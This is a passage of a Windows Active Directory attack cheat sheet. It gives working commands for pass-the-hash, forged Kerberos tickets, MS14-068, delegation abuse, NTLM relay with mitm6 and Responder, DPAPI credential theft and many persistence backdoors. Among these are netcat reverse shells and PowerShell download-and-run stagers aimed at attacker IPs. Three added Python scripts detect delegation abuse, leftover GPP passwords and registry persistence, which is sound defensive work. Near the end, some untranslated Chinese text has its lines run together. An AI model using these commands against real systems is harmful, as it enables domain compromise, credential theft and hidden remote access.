>sekurlsa::pth /user:administrator /domain:zone.com /aes128:{key}

pth-winexe

>pth-winexe -U godadmin%password --system --ostype=1 //192.168.0.115 cmd

Smbexec

>python smbexec.py administrator@192.168.0.98

PASS-THE-TICKET

Terms

KDC (Key Distribution Center): the key distribution center, containing two services, AS and TGS
AS (Authentication Server): the authentication service
TGS (Ticket Granting Server): the ticket granting service
TGT (Ticket Granting Ticket): ticket issued by the authentication service, used for authentication, kept in memory, valid for 10 hours by default

Golden ticket + Mimikatz

A Golden Ticket is a forged TGT (Ticket Granting Ticket) that grants access to any Kerberos service. The krbtgt hash is extracted on the domain controller.
DC: dc.zone.com
Domain member: sub2k8.zone.com
Ordinary domain user: y
The domain member cannot access files on the DC.
Purge tickets.
On the DC, obtain the krbtgt user's information:
>privilege::debug
>mimikatz log "lsadump::dcsync /domain:zone.com /user:krbtgt"
Collect: /domain, /sid, /aes256
On sub2k8 generate the golden ticket:
>mimikatz "kerberos::golden /krbtgt:{ntlmhash} /admin:<domain admin> /domain:<domain> /sid:<sid> /ticket:gold.kirbi"
Import into Mimikatz:
#kerberos::ptt gold.kirbi

Silver ticket + Mimikatz

A Silver Ticket is a forged TGS and only grants access to the specified service.
DC: dc.zone.com
Domain member: sub2k8.zone.com
Ordinary domain user: y
Export on the DC:
>privilege::debug
>sekurlsa::logonpasswords
Forge the ticket on sub2k8:
>mimikatz "kerberos::golden /domain:zone.com /sid:{SID} /target:dc.zone.com /service:cifs /rc4:{NTLM} /user:y /ptt"

MS14-068

https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068
https://github.com/crupper/Forensics-Tool-Wiki/blob/master/windowsTools/PsExec64.exe
DC: dc.zone.com / 10.1.1.100
Domain member: sub2k8.zone.com / 10.1.1.98
Ordinary domain user: y
Purge tickets on sub2k8:
Mimikatz#kerberos::purge
>whoami /user   view the SID
Create the ccache ticket file:
>MS14-068.exe -u y@zone.com -p password -s S-1-5-21-2346829310-1781191092-2540298887-1112 -d dc.zone.com
Inject the ticket:
Mimikatz# Kerberos::ptc c:\xx\xx\xxx.ccache
psexec login without a password:
>PsExec.exe \\dc.xx.com\ cmd.exe

Mimikatz + MSF

>whoami /user   view the SID
msf >use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
msf >set domain <domain>
msf >set password <password>
msf >set rhost <domain controller>
msf >set user <user>
msf >set user_sid <sid>
This produces a .bin file.
#apt-get install krb5-user
Upload mimikatz and the bin file.
Mimikatz# Kerberos::clist "xxxx.bin" /export   generates a kirbi file
Meterpreter >load kiwi
Meterpreter >download c:/wmpub/xxxxxx.kirbi /tmp/
Inject the ticket:
Meterpreter >kerberos_ticket_use /tmp/xxxxxx.kirbi
#use exploit/windows/local/current_user_psexec
#set TECHNIQUE PSH
#set RHOST dc.xx.com
#set payload windows/meterpreter/reverse_tcp
#set LHOST 192.168.1.1
#set session 1
#exploit

goldenPac.py

On kali:
#apt-get install krb5-user
#goldenPac.py -dc-ip 10.1.1.100 -target-ip 10.1.1.100 zone.com/y:password@dc.zone.com

Account delegation

Unconstrained delegation

Set user y as a service account (service accounts have delegation rights):
>setspn -U -A variant/golden y
Query domain accounts with unconstrained delegation using PowerView:
>Get-NetUser -Unconstrained -Domain zone.com
Open mimikatz with administrator privileges and export the TGT:
>privilege::debug
>sekurlsa::tickets /export
Purge the tickets, then import the exported ticket.

Get a PowerShell session:
>Enter-PSSession -ComputerName dc.zone.com

Constrained delegation

Query users with constrained delegation:
>Get-DomainUser -TrustedToAuth -Domain zone.com
Query hosts with constrained delegation:
>Get-DomainComputer -TrustedToAuth -Domain zone.com
The exploitation method is covered later in the persistence section.

Resource-based constrained delegation

Get a domain administrator:
>Get-DomainUser|select -First 1
Domain object information:
>Get-DomainObject -Identity 'DC=zone,DC=com'
ms-ds-machineaccountquota allows an unprivileged user to join up to 10 computers to the domain.
Check whether the msDS-AllowedToActOnBehalfOfOtherIdentity policy is set:
>Get-DomainComputer dc|select name, msDS-AllowedToActOnBehalfOfOtherIdentity
Use Powermad to add a machine account with an SPN:
https://github.com/Kevin-Robertson/Powermad
>New-MachineAccount -MachineAccount newcom
Or:
>$pass = ConvertTo-SecureString '123qwe!@#' -AsPlainText -Force
>New-MachineAccount -MachineAccount newcom -Password $pass
Or:
>New-MachineAccount -MachineAccount newcom -Password $(ConvertTo-SecureString '123qwe!@#' -AsPlainText -Force)
Get the SID of the added machine account.
Set the SID of the added machine account on the DC's msDS-AllowedToActOnBehalfOfOtherIdentity attribute:
>$SD=New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-2346829310-1781191092-2540298887-1122)"; $SDBytes = New-Object byte[] ($SD.BinaryLength);$SD.GetBinaryForm($SDBytes, 0);Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
Check the attribute after setting it.
Read the ACL that now grants access:
>$RawBytes=Get-DomainComputer dc -Properties 'msds-allowedtoactonbehalfofotheridentity' |select -expand msds-allowedtoactonbehalfofotheridentity;$Descriptor= New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes,0;$Descriptor.DiscretionaryAcl
Now the hash of the created machine account can be used to impersonate a domain admin. First get newcom's NTLM:
>Rubeus.exe hash /password:123qwe!@# /user:newcom /domain:zone.com
Import a ticket impersonating the domain admin user to access the cifs service:
>Rubeus.exe s4u /user:newcom$ /rc4:00AFFD88FA323B00D4560BF9FEF0EC2F /impersonateuser:godadmin /msdsspn:cifs/dc.zone.com /ptt
A TGS for godadmin is obtained.
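The SDDL string written into msDS-AllowedToActOnBehalfOfOtherIdentity above is also what an auditor reads back to find out who may act on behalf of a computer. The parser below is an added example, not code from Pentest_Note; SDDL_FROM_NOTE is the descriptor used above, while SDDL_CONSTRUCTED and the EXPECTED baseline are constructed to show the general case with several ACEs.

```python
"""Parse the DACL of an SDDL string such as the one set on
msDS-AllowedToActOnBehalfOfOtherIdentity above and list the trustees that may
act on behalf of the computer. Added example, not from Pentest_Note;
SDDL_CONSTRUCTED and EXPECTED are constructed."""
import re

SDDL_FROM_NOTE = "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-2346829310-1781191092-2540298887-1122)"
# constructed: two Allow ACEs, one of them using the BA (Builtin Administrators) alias
SDDL_CONSTRUCTED = "O:BAD:AI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-2346829310-1781191092-2540298887-1100)(A;;GA;;;BA)"
# constructed baseline: machine accounts an administrator knowingly delegated to
EXPECTED = {"S-1-5-21-2346829310-1781191092-2540298887-1100"}

# a few well-known SDDL trustee aliases that may stand in for a SID
ALIASES = {
    "BA": "BUILTIN\\Administrators",
    "SY": "NT AUTHORITY\\SYSTEM",
    "DA": "Domain Admins",
    "WD": "Everyone",
}

# D: introduces the DACL; optional flags (P, AI, AR) precede the parenthesised ACEs
DACL_RE = re.compile(r"D:(?P<flags>[A-Z]*)(?P<aces>(?:\([^)]*\))*)")
ACE_RE = re.compile(r"\(([^)]*)\)")


def parse_dacl(sddl):
    """Return one dict per ACE: type ('A' allow / 'D' deny), flags, rights
    string and trustee (SID, or alias expanded through ALIASES)."""
    m = DACL_RE.search(sddl)
    if not m:
        return []
    aces = []
    for body in ACE_RE.findall(m.group("aces")):
        parts = body.split(";")
        if len(parts) != 6:  # type;flags;rights;object_guid;inherit_guid;trustee
            raise ValueError("malformed ACE: " + body)
        ace_type, flags, rights, _obj_guid, _inherit_guid, trustee = parts
        aces.append({"type": ace_type, "flags": flags, "rights": rights,
                     "trustee": ALIASES.get(trustee, trustee)})
    return aces


def allowed_to_act(sddl):
    """Trustees holding an Allow ACE: on this attribute each of them can use
    S4U2Proxy to obtain service tickets to the computer as any user."""
    return sorted(a["trustee"] for a in parse_dacl(sddl) if a["type"] == "A")


def unexpected_delegates(sddl, expected):
    """Trustees not present in the administrator-maintained baseline."""
    return [t for t in allowed_to_act(sddl) if t not in expected]


if __name__ == "__main__":
    print("from the note:", allowed_to_act(SDDL_FROM_NOTE))
    print("unexpected in constructed SDDL:", unexpected_delegates(SDDL_CONSTRUCTED, EXPECTED))
```

Resolve any SID that is not in the baseline to its object; a freshly created machine account that an ordinary user could add (ms-DS-MachineAccountQuota) is the indicator described above.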



CVE-2019-0708

>python ntlmrelayx.py -t ldaps://dc.zone.com --remove-mic --delegate-access -smb2support
>python printerbug.py zone.com/y@win7.zone.com 192.168.0.attack
>python getST.py -spn host/win7.zone.com 'zone.com/<machine account>$:<password>' -impersonate administrator -dc-ip 192.168.0.1
>export KRB5CCNAME=XX.ccache
>python secretsdump.py -k -no-pass dc.zone.com -just-dc

NTLM relay

Ntlmrelayx + resource-based constrained delegation

The DC must have LDAPS enabled and domain hosts must have IPv6 enabled. *If running the ntlmrelayx script produces an error:
Edit impacket/impacket/examples/ntlmrelayx/attacks/ldapattack.py and add above line 510: if self.config.interactive:
Then reinstall:
>python setup.py install
Use mitm6 to take over DNS over IPv6; once configured, it starts answering the network's WPAD requests:
>mitm6 -i eth1 -d zone.com
Listen with ntlmrelayx.py:
>python ntlmrelayx.py -t ldaps://dc.zone.com -debug -ip 10.1.1.101 --delegate-access --add-computer
When a target restarts its network, opens a browser or reboots, it treats the attacker machine as its proxy server. When the target then accesses the network through that proxy, the attacker machine sends it a proxy authentication request and relays the NTLM authentication to the LDAP server, completing the attack. LDAPS is required because the DC refuses to create accounts over an insecure connection.
A machine account RFAYOVCC with password 6YdX.NXqQGyuR7[ has been added. Request a ticket with this machine account:
>python getST.py -spn cifs/sub2k8.zone.com zone.com/RFAYOVCC\$ -impersonate y
>export KRB5CCNAME=y.ccache
Get a shell:
>python smbexec.py -no-pass -k sub2k8.zone.com
Dump hashes and cached hashes:
>python secretsdump.py -k -no-pass sub2k8.zone.com
When the DC does not have LDAPS enabled and an ordinary domain user has already been obtained, create a machine account newcom with Powermad:
https://github.com/Kevin-Robertson/Powermad
>New-MachineAccount -MachineAccount newcom -Password $(ConvertTo-SecureString '123qwe!@#' -AsPlainText -Force)

>python ntlmrelayx.py -t ldaps://dc.zone.com -debug -ip 10.1.1.101 --delegate-access --escalate-user newcom\$
Then continue as before.
When a Java WebDAV server exists in the internal network, the PROPPATCH, PROPFIND and LOCK request methods accept XML as input and give rise to XXE. When the attacker requests NTLM authentication, WebDAV automatically authenticates with the current user's credentials. Listen with ntlmrelayx:
>python ntlmrelayx.py -t ldaps://dc.zone.com -debug -ip 10.1.1.101 --delegate-access --escalate-user newcom\$
Send the XXE request from Burp:
PROPFIND /webdav HTTP/1.1
Host: 1.1.1.1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [<!ENTITY loot SYSTEM "http://10.1.1.101"> ]>
<D:xxe xmlns:D="DAV:"><D:set><D:prop><a xmlns="http://xx.e">&loot;</a></D:prop></D:set></D:xxe>

Responder

SMB capture
Internal man-in-the-middle script, built into kali. Listen on a network interface:
>responder -I wlan0 (or eth0)
To target a specific host or subnet, change the RespondTo parameter in /etc/responder/Responder.py. Any authentication on the subnet captures NTLMv2 hashes.
To parse XP when a non-existent share is accessed, edit the configuration: in /usr/share/responder/servers/SMB.py find errorcode and change it to \x71\x00\x00\xc0, then delete /usr/share/responder/Responder.db.
On XP, accessing a share as \\cmd\share disconnects after the password has been entered 4 times. Find
self.ntry and change the condition to self.ntry != 10. For Win7 and above, edit /usr/share/responder/servers/SMB.py, find ##Session Setup 3
and remove "and GrabMessageID(data)[0:1] == "\x02"", then delete /usr/share/responder/Responder.db. After this change parsing works and hashes are captured; otherwise error 64 is reported.
To force NTLMv1 hash capture, edit /usr/share/responder/packets.py, find the parameter below and change it to \x15\x82\x81\xe2, and set Challenge in the conf file to a fixed 16-character value.

WPAD proxy spoofing
>responder -I eth0 -v -F
The -F option enables forced WPAD authentication to capture hashes; opening IE or rebooting triggers the spoofed authentication and yields the hash.

The hash is also captured on reboot.
Web vulnerabilities
Using file inclusion and XSS in the internal network:
>Responder -I eth0 -v
http://10.1.1.1/file.php?file=\\10.1.1.12\share
http://10.1.1.1/xss.php?article=<img src=\\10.1.1.12\xx>
Relay attack
Edit /etc/responder/Responder.conf and set smb and http to Off. Open two terminals: enable WPAD spoofing of browsers with -F, and use MultiRelay.py from /usr/share/responder/tools to relay and obtain a cmd shell on the target.
>Responder -I eth0 -v -F
>python MultiRelay.py -t 192.168.0.115 -u ALL

Cracking NTLMv2 hashes
Crack with hashcat; -m 5600 is the NTLMv2 type:
>hashcat -m 5600 pass.txt wordlists.txt

GPP-Password

Domain members can access the share \\zone.com\SYSVOL\zone.com. Browse the policy files for groups.xml, ScheduledTasks\ScheduledTasks.xml, Printers\Printers.xml, Drives\Drives.xml, DataSources\DataSources.xml, Services\Services.xml and similar files.
Decrypt with the PowerSploit script.
Use the msf module auxiliary/scanner/smb/smb_enum_gpp.
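From the defender's side the same SYSVOL files are where to look for leftover GPP credentials (MS14-025): any preference item that still carries a cpassword attribute must be removed, since the AES key that decrypts it is public. The scanner below is an added example, not code from Pentest_Note; the XML documents are constructed, modelled on the Groups.xml and ScheduledTasks.xml layouts named above, and the cpassword values are placeholders.

```python
"""Locate Group Policy Preference items that still store a cpassword.
Added example, not from Pentest_Note; SYSVOL_FILES is constructed and the
cpassword values are placeholders, not real encrypted blobs."""
import xml.etree.ElementTree as ET

SYSVOL_FILES = {  # constructed: UNC path -> file content
    r"\\zone.com\SYSVOL\zone.com\Policies\{GUID-1}\Machine\Preferences\Groups\Groups.xml": """\
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="localadmin" changed="2020-01-01 10:00:00">
    <Properties action="U" newName="" fullName="" description=""
      cpassword="ConstructedCpasswordBlob1==" changeLogon="0"
      noChange="1" neverExpires="1" acctDisabled="0" userName="localadmin"/>
  </User>
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="helpdesk">
    <Properties action="U" userName="helpdesk" description="no password stored"/>
  </User>
</Groups>
""",
    r"\\zone.com\SYSVOL\zone.com\Policies\{GUID-2}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml": """\
<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
  <Task clsid="{2DEECB1C-261F-4e13-9B21-16FB83BC03BD}" name="Backup">
    <Properties action="C" runAs="ZONE\\svc_backup" cpassword="ConstructedCpasswordBlob2==" appName="backup.exe"/>
  </Task>
</ScheduledTasks>
""",
}

# attributes that name the account a cpassword belongs to, per preference type
ACCOUNT_ATTRS = ("userName", "runAs", "accountName")


def find_cpasswords(files):
    """Return (path, preference type, account, cpassword) for every element
    in the given XML files that carries a cpassword attribute. Works for all
    preference types (Groups, ScheduledTasks, Services, Drives, DataSources,
    Printers) because only the attribute name is matched."""
    hits = []
    for path, content in files.items():
        root = ET.fromstring(content)
        for elem in root.iter():           # iter() includes nested Properties elements
            cpw = elem.get("cpassword")
            if cpw is None:
                continue
            account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "?")
            hits.append((path, root.tag, account, cpw))
    return hits


if __name__ == "__main__":
    for path, kind, account, _cpw in find_cpasswords(SYSVOL_FILES):
        print(f"{kind:15} {account:20} {path}")
```

Each hit should be deleted from the GPO (and the account's password rotated); the KB2962486 update only stops new cpassword entries from being written, it does not clean up existing ones.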

WinRM fileless execution

>winrm quickconfig -q   start winrm
or PS>Enable-PSRemoting -Force
Generate the payload and start the listener.

Place it on the C drive of a host whose privileges have already been obtained; on another internal host run:
>net use \\192.168.0.115\c$
>winrm invoke create wmicimv2/win32_process @{commandline="\\192.168.0.115\c$\index.exe"}

Command to add a domain admin

>net user admin$ pass@123 /add /domain
>net group "Domain admins" admin$ /add /domain

Passwordless SSH login with a key

>ssh -i id_rsa user@192.168.0.110

Retrieving saved RDP passwords

Location: C:\Users\<user>\AppData\Local\Microsoft\Credentials
View:
>cmdkey /list
>mimikatz log
#dpapi::cred /in:C:\Users\administrator\AppData\Local\Microsoft\Credentials\D53BF8DC4D52D75463D46595907A4015
Note guidMasterKey: {572115f2-80b1-4b1e-be1b-425f5c7a8bfd}
#privilege::debug
#sekurlsa::dpapi
Find the MasterKey value listed under the GUID equal to guidMasterKey: d928f5e02d2e9495f92bb…
#dpapi::cred /in:C:\Users\administrator\AppData\Local\Microsoft\Credentials\D53BF8DC4D52D75463D46595907A4015 /masterkey:d928f5e02d2e9495f92bb…
The password is the CredentialBlob value.

Backdoors & persistence

Shadow users

>net user test$ test /add
>net localgroup administrators test$ /add
In the registry grant administrator full control and read permissions on HKEY_LOCAL_MACHINE\SAM\SAM\.
Export the following as 1.reg: HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\test$
Note the default type of HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\test$: 000003EA
Export the following as 2.reg: HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003EA
The default type of administrator is 000001F4
Export the following as 3.reg: HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
Paste the F value of 000001F4 (3.reg) into the F value of 000003EA (2.reg). After editing, import:
>regedit /s 1.reg
>regedit /s 2.reg
Delete the user: net user test$ /del
PowerShell script:
https://github.com/3gstudent/Windows-User-Clone/blob/master/Windows-User-Clone.ps1
Requires SYSTEM privileges:
>Create-Clone -u <user to create> -p <password> -cu <user to clone>

RID hijacking

Scenarios: activate guest and change its RID to the administrator's; change a low-privileged user's RID. Before the hijack, ordinary user 1 has its original RID value.
Use the msf post/windows/manage/rid_hijack module.
After running it, the RID has changed to the super-admin's.
Ordinary user 1 now logs in with super-admin privileges.

Guest activation

Activate the guest account, change its password and add it to the administrators group:
>net user guest /active:yes
>net user guest 123qwe!@#
>net localgroup administrators guest /add

Image hijacking

Sethc

>move sethc.exe 1.exe
>copy cmd.exe sethc.exe
Pressing Shift 5 times launches cmd.

Ease of Access

Registry: under Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ create Utilman.exe, then the string value Debugger set to C:\Windows\System32\cmd.exe
>REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

IFEO silent execution

Under Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe create the DWORD value GlobalFlag with hex value 200.
Create Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe with the string value MonitorProcess=muma.exe and the DWORD value ReportingMode=1
>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f
>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe" /v ReportingMode /t REG_DWORD /d 1 /f
>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe" /v MonitorProcess /t REG_SZ /d "c:\windows\system32\cmd.exe" /f

Registry run keys

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce

MSF

Add a listener:
Meterpreter> reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'
Check that it was added:
Meterpreter> reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
Meterpreter> reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Open a firewall inbound rule:
>netsh firewall add portopening TCP 444 "name" ENABLE ALL
Reboot:
>shutdown -r -t 0

CMD

View run keys:
>REG query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Add an entry:
>REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "windowsupdate" /t REG_SZ /F /D "c:\windows\temp\update.exe"
Delete an entry:
>REG delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "windowsupdate" /f

Scheduled tasks

Load powershell

>schtasks /Create /tn <name> /tr <program> /sc hourly /mo 1
>schtasks /create /S TARGET /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://192.168.0.107:8080/Invoke-PowerShellTcp.ps1''')'"

Run an exe

Create the task:
>schtasks /create /RL HIGHEST /F /tn "windowsupdate" /tr "c:\windows\temp\update.exe" /sc DAILY /mo 1 /ST 12:25 /RU SYSTEM
Query the task:
>schtasks /query | findstr "windowsupdate"
Run the task immediately:
>schtasks /run /tn "windowsupdate"
Delete the task:
>schtasks /delete /F /tn "windowsupdate"
Scheduled task with ordinary user privileges:
>schtasks /create /F /tn "windowsupdate" /tr "D:\user\zhangsan\file\windowsupdate.exe" /sc DAILY /mo 1 /ST 12:25
>schtasks /query | findstr "windowsupdate"
>schtasks /run /tn "windowsupdate"
>schtasks /delete /F /tn "windowsupdate"
>schtasks /tn "SysDebug" /query /fo list /v

Process injection

AppCertDlls

Under the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\ create AppCertDlls, and inside it a value named Default with the data c:\1.dll
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f dll >/root/1.dll
Msf>use exploit/multi/handler
Msf>set payload windows/meterpreter/reverse_tcp
https://cdn.securityxploded.com/download/RemoteDLLInjector.zip
>RemoteDLLInjector64.exe <PID> c:\1.dll

AppInit_DLLs

Under the registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows\ set AppInit_DLLs to c:\1.dll and LoadAppInit_DLLs to 1

MSF

Msf>use post/windows/manage/reflective_dll_inject
Msf>set session 1
Msf>set pid 1234
Msf>set path c:\\1.dll
Msf>run
&
migrate <pid>
&
Meterpreter>run post/windows/manage/migrate

Logon initialization

Under Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon extend the Userinit value:
>Powershell.exe Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\WINDOWS NT\CurrentVersion\Winlogon" -name Userinit -value "C:\Windows\system32\userinit.exe,c:\muma.exe"
Under Computer\HKEY_CURRENT_USER\Environment create the value UserInitMprLogonScript with the data c:\muma.exe
&
PowerShell implementation:
>Set-ExecutionPolicy RemoteSigned
Save as a .ps1 and run:
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\WINDOWS NT\CurrentVersion\Winlogon" -name Userinit -value "C:\Windows\system32\userinit.exe,powershell.exe -nop -w hidden -c $w=new-object net.webclient;$w.proxy=[Net.WebRequest]::GetSystemWebProxy();$w.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $w.downloadstring('http://192.168.2.11:8080/kaMhC1');"
# The PowerShell reverse-shell payload follows msf's web_delivery module.
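The registry locations used in the IFEO, SilentProcessExit, Run-key, AppInit_DLLs, AppCertDlls and Winlogon Userinit sections above are the same ones a responder enumerates when hunting for persistence. The checker below is an added example, not code from Pentest_Note; it parses a `reg export`-style text and REG_EXPORT is constructed to contain the entries those sections create.

```python
"""Scan a Windows registry export (.reg text) for the persistence locations
described above. Added example, not from Pentest_Note; REG_EXPORT is
constructed and assumes 'reg export' formatting: [Key] headers followed by
"Name"=value lines, with backslashes doubled inside string values."""
import re

REG_EXPORT = r'''
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"GlobalFlag"=dword:00000200
"Debugger"="C:\\windows\\system32\\cmd.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe]
"ReportingMode"=dword:00000001
"MonitorProcess"="c:\\windows\\system32\\cmd.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
"windowsupdate"="c:\\windows\\temp\\update.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="C:\\Windows\\system32\\userinit.exe,c:\\muma.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"="c:\\1.dll"
"LoadAppInit_DLLs"=dword:00000001
'''

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"([^"]+)"=(.*)$')

IFEO = "\\image file execution options\\"
SPE = "\\silentprocessexit\\"
RUN_KEYS = ("\\currentversion\\run", "\\currentversion\\runonce", "\\policies\\explorer\\run")
TRUSTED_RUN_DIRS = ("c:\\windows\\system32\\", "c:\\program files\\", "c:\\program files (x86)\\")


def parse_reg_export(text):
    """Return {key_path: {value_name: data}}; dword values become int and
    string values have their doubled backslashes collapsed."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            keys[current] = {}
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name, data = m.groups()
            if data.startswith("dword:"):
                data = int(data[6:], 16)
            elif data.startswith('"') and data.endswith('"'):
                data = data[1:-1].replace("\\\\", "\\")
            keys[current][name] = data
    return keys


def audit_persistence(keys):
    """Return (technique, key, value_name, data) for each suspicious entry."""
    findings = []
    for key, values in keys.items():
        low = key.lower()
        if IFEO in low and "Debugger" in values:
            findings.append(("IFEO Debugger", key, "Debugger", values["Debugger"]))
        if SPE in low and "MonitorProcess" in values:
            findings.append(("SilentProcessExit MonitorProcess", key, "MonitorProcess", values["MonitorProcess"]))
        if any(low.endswith(k) for k in RUN_KEYS):
            for name, data in values.items():
                if not str(data).lower().startswith(TRUSTED_RUN_DIRS):
                    findings.append(("Run key outside trusted directories", key, name, data))
        if low.endswith("\\winlogon") and "Userinit" in values:
            parts = [p.strip() for p in values["Userinit"].split(",") if p.strip()]
            if len(parts) != 1 or not parts[0].lower().endswith("\\userinit.exe"):
                findings.append(("Winlogon Userinit extended", key, "Userinit", values["Userinit"]))
        if low.endswith("\\currentversion\\windows") and values.get("AppInit_DLLs"):
            findings.append(("AppInit_DLLs set", key, "AppInit_DLLs", values["AppInit_DLLs"]))
        if low.endswith("\\session manager\\appcertdlls"):
            for name, data in values.items():
                findings.append(("AppCertDlls entry", key, name, data))
    return findings


if __name__ == "__main__":
    for technique, key, name, data in audit_persistence(parse_reg_export(REG_EXPORT)):
        print(f"{technique}: {key} \\ {name} = {data}")
```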

          屏幕保護程序

          計算機\HKEY_CURRENT_USER\Control Panel\DesktopSCRNSAVE.EXE - 默認屏幕保護程序,改為惡意程序(設置備份)ScreenSaveActive - 1表示屏幕保護是啟動狀態,0表示表示屏幕保護是關閉狀態ScreenSaverTimeout - 指定屏幕保護程序啟動前系統的空閑事件,單位為秒,默認為900(15分鐘)

          MOF

          >git clone https://github.com/khr0x40sh/metasploit-modules.git>mv metasploit-modules/persistence/mof_ps_persist.rb /usr/share/metasploit-framework/modules/post/windows/>reload_all>use post/windows/mof_ps_persist>set payload windows/x64/meterpreter/reverse_tcp>set lhost 192.168.0.108>set lport 12345>set session 1>run
          >use exploit/multi/handler>set payload windows/x64/meterpreter/reverse_tcp>set lhost 192.168.0.108>set lport 12345>set exitonsession false
          重啟后還會上線
          清除后門,進入meterpreter,resource 生成的rc文件停止MOF>net stop winmgmt刪除文件夾:C:\WINDOWS\system32\wbem\Repository\>net start winmgmt

          WinRM端口復用

          WinRM端口5985,win2012以上默認啟動,2008開啟命令>winrm quickconfig -q2012啟用端口復用>winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}2008啟用WinRM后修改端口為80>winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"}后門連接和使用本地開啟WinRM并設置信任連接主機>winrm quickconfig -q>winrm set winrm/config/Client @{TrustedHosts="*"}執行命令>winrs -r:http://10.1.1.100 -u:administrator -p:password ipconfig /all獲取cmdshell>winrs -r:http://10.1.1.100 -u:administrator -p:password cmd
          只administrator允許遠程登錄WinRM,允許其他用戶可以登錄,執行注冊表>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

          創建服務

Persist an nc shell across reboots as a service
>sc create ms binpath= "cmd /K start c:\nc\nc64.exe -d 192.168.0.51 4567 -e cmd.exe" start= delayed-auto error= ignore
Persist a PowerShell stager across reboots
#msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=11111 -f psh-reflection > /var/www/html/xxx.ps1
